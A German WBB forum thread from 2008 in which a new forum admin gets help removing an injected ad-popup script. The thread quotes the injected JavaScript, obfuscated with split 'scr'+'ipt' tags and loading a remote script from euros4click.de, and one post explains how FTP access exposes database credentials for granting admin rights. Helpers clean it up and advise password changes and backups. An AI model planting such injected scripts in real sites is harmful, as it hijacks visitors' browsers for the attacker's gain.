Werbungskript |
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
|
|
Hi
Mein Admin hat mich auch dieses Code hingewiesen.
<script kannst froh sein, hab nix Kaputt gemacht Language="JavaScript">
document.write ('<scr' + 'ipt Language="JavaScript" src="http://www.euros4click.de/showme.php?id=7253&rnd=' + Math.random() + '"></scr' + 'ipt>');
</script>
Ich weiss nicht wo der drin ist, aber sobald ich aud den Start Button klicke kommt ein Popup Fenster von Euroklicks...
Wie bekomme ich das wieder weg?
Ich bin noch nicht so lang Admin ich weiss nicht wo das her kommt und wo ich danach suchen muss.
Wäre echt super wenn ihr mir hier helfen könntet.
Ich hab schon sämtliche tpl und php fast duch...
Gruß Schlapski
|
|
22.04.08 13:04 |
E-Mail
Finden
Als Freund hinzufügen
|
|
C-Board unregistriert
|
|
Kannst Du mir einen Admin-Zugang zu Deinem Forum (per PN) geben? Dann schaue ich mir das eben an.
Gruß Mike
|
|
22.04.08 13:05 |
|
|
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
Themenstarter
|
|
auch gut zu wissen... Maniac THX für den Hinweis.
@ C Board
wenn du sowieso mal da bist ich habe rechts im ACP jede Menge Links die ins nichts führen.. wie bekomme ich die weg? Oder ist da was wichtiges bei?
Könntest du da auch mal schauen?
THX
Gruß Schlapski
|
|
22.04.08 13:30 |
E-Mail
Finden
Als Freund hinzufügen
|
|
C-Board unregistriert
|
|
In Deiner Forenbeschreibung für das Unterforum "News" wurde manipuliert.
code: |
1:
2:
3:
4:
5:
6:
7:
8:
|
Die Board NEWS
<script kannst froh sein, hab nix Kaputt gemacht Language="JavaScript">
document.write ('<scr' + 'ipt Language="JavaScript" src="http://www.euros4click.de/showme.php?id=7253&rnd=' + Math.random() + '"></scr' + 'ipt>');
</script>
|
|
Ich habe das rausgenommen. Empfehlung: Wechsel unverzüglich ALLE PW aus. Traust Du Deinem Team?
Seit wann war dieser "Fehler" zu sehen?
Das mit den Links deutet darauf hin, dass da jede Menge Sprachvariablen fehlen. Seit wann sind diese merkwürdigen Links da so zu sehen? Einige davon sind nicht tot. Sind die Hacks denn noch aktiv?
Gruß Mike
|
|
22.04.08 13:56 |
|
|
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
Themenstarter
|
|
Erstmal big THX
wo genau lag denn dieses " Skript" ?
Wir hatten auch mal 2 User die an alle PN´s verschickt haben. Danach haben wir alles mit htacces geschützt und die PW gewechselt.
Habe jetzt für dich das ht. deaktiviert.
Also als ich Admin geworden bin waren die Links schon da. Ich habe keinen blassen schimmer ob da was von geht oder nicht. Es ist ein paar mal drüber installiert worden.
Ich hab mir schon überlegt ein komplett neues Board aufzubauen, und mir dann nur User Treads PN und Postings aus der SQL zu holen. Weiss nicht was man noch alles so braucht...
Primär wollte ich erstmal nur das es wieder so halbwegs läuft.
Erstmal Vielen Lieben Dank
Gruß Schlapski
PS Kann ich den Account wieder dicht machen?
|
|
22.04.08 14:07 |
E-Mail
Finden
Als Freund hinzufügen
|
|
C-Board unregistriert
|
|
Warte noch mal einen Moment. Ich schau mir das mit den Variablen gerade noch an.
Wenn der ACP-Zugang htaccess-abgesichert ist, dann kommt nur einer von denen in Frage, die den Benutzernamen und das PW für eben diese Absicherung kennen. Ich will ja nicht hoffen, dass da identische Namen/Pw zu den WBB-ACP-Logindaten eingetragen sind
Der- oder diejenige hat in der Forenbeschreibung den Code eingegeben. Das geht nur über das ACP oder aber direkter Zugang zur DB.
Gruß Mike
|
|
22.04.08 14:17 |
|
|
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
Themenstarter
|
|
ist es jetzt im board.tpl gewesen oder wo hätte ich es genau finden können?
Wie gesagt bin noch nicht lang Admin .. <gg>
Nein natürlich sind die nicht identisch...
Wie hast du das über ACP gefunden? Will ja nicht das mir sowas nicht nochmal passiert
Gruß Schlapski
|
|
22.04.08 14:20 |
E-Mail
Finden
Als Freund hinzufügen
|
|
ENTE
So quasi!
Dabei seit: 21.04.07
Beiträge: 741
Fähigkeiten: WBB3 Profi; WBB2 Profi; WBB Lite 2 Profi Herkunft: Bernrieder Winkel Forenversion: 3.0; 2.3
|
|
Denk auch mal drüber nach, wer hat dir schonmal hacks eingabaut, bzw wem hast du alles deine ftp daten gegeben, denn wer zugriff auf die ftp daen hat, kann über die datei /acp/lib/optons.inc.php auch die Daten zur datenbank herausfinden. wenn sich dieser dann im forum registriert, kann er sich via datenbank adminrechte geben.
__________________
App-Store-Apps.de
Real programmers don't comment their code - it was hard to write, it should be hard to understand
|
|
22.04.08 14:21 |
E-Mail
Finden
Als Freund hinzufügen
|
|
C-Board unregistriert
|
|
In den Templates konntest Du nichts finden. Ich habe mir den Seitenquelltext angeschaut und da war der Code ja an einer merkwürdigen Stelle. Also habe ich mir das Forum NEWS angeschaut und da war der Code in der Beschreibung.
Mit der Suchfunktion im ACP klappt das natürlich nicht
Kannst den Account übrigens löschen.
Gruß Mike
|
|
22.04.08 14:29 |
|
|
C-Board unregistriert
|
|
Naja, das mit den geloggten AdminSessions ist eh' so eine Sache.
Ich melde mich im ACP an. Wenn ich es verlassen will, dann klicke ich oben auf "Abmelden". In dem Moment wird die ../acp/logout.php aufgerufen. Und diese löscht den Eintrag in der DB-Tabelle. Wenn es danach geht, war ich im ACP meines eigenen Forums letzmalig vor 10 Tagen
(obwohl ich mehrfach am Tage da drin bin).
Ist also nicht unbedingt eine Möglichkeit nachzuvollziehen, wer wann da aktiv war.
Gruß Mike
|
|
22.04.08 14:45 |
|
|
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
Themenstarter
|
|
So nun mal zum besseren Verständnis
Das Skript lag also unter ACP / Foren bearbeiten/Beschreibung des Forums/ Foren News dann ein paar eingaben mit Retun gemacht damit es nicht sofort auffällt , was das dort?
Das hätte ich ja in 100 Jahren nicht gefunden.
Da muss man mal erstmal drauf kommen.
Habe mich eben in deinem Board gereggt... Das EM Tippspiel interesiert mich
Gruß Schlapski
|
|
22.04.08 15:05 |
E-Mail
Finden
Als Freund hinzufügen
|
|
C-Board unregistriert
|
|
Freut mich.
Aber Du solltest vor dem EM-Hack tatsächlich erstmal Ordnung schaffen in Deinem Forum. Da scheinen dann ja in der Tat jede Menge Hacks noch in den DB-Tabellen verewigt zu sein, die es schon gar nicht mehr gibt.
Wie hälst Du es denn eigentlich mit Backups der Datanbank? Machst du die eigentlich regelmäßig?
Ich empfehle Dir (sofern nicht schon geschehen) den Einsatz vom MySQLDumper.
Und bevor Du da ans Großreinemachen gehst, mach in jedem Fall ein komplettes Backup der DB.
Nochmal zurück zum Sicherheits-Aspekt. ENTE hat es genau richtig erläutert, wie es gehen kann.
Ändere auch für die DB das Passwort und trage das neue in die config.inc.php ein.
Dann ändere am Besten noch das FTP-Login.
Ich würde es so schnell wie möglich machen. Und dann nur noch ein User Zugang zum ACP - nämlich Du selbst. Zumindest für die nächste Zeit. Da müssen eben alle Verständnis für haben. Immerhin hätte der Schaden viel größer sein können.
Und Dein Forum hat ja nun mal eine beträchtliche Größe an Mitgliedern und Beiträgen. Das soll geschützt sein/bleiben.
Wenn Du da Hilfe brauchst, dann melde Dich bei mir. Wir können gern kurzfristig telefonieren und im Einzelnen alles durchgehen. Würde ich in diesem Falle sogar heute abend einschieben, weil wichtig genug.
Gruß Mike
|
|
22.04.08 15:26 |
|
|
Schlapski
Mitglied
Dabei seit: 24.09.07
Beiträge: 19
Themenstarter
|
|
Das ist sehr lieb gemeint aber hättest du in die ACP Sitzung geschaut da steht drin das ich seit 6 Tagen von 5- 23 darin gewurstelt habe.
Ich mach heute mal Pause
Ich komme aber sehr gern auf dein Angebot zurück.
Vielen Dank
Gruß Schlapski
|
|
22.04.08 15:34 |
E-Mail
Finden
Als Freund hinzufügen
|
|
|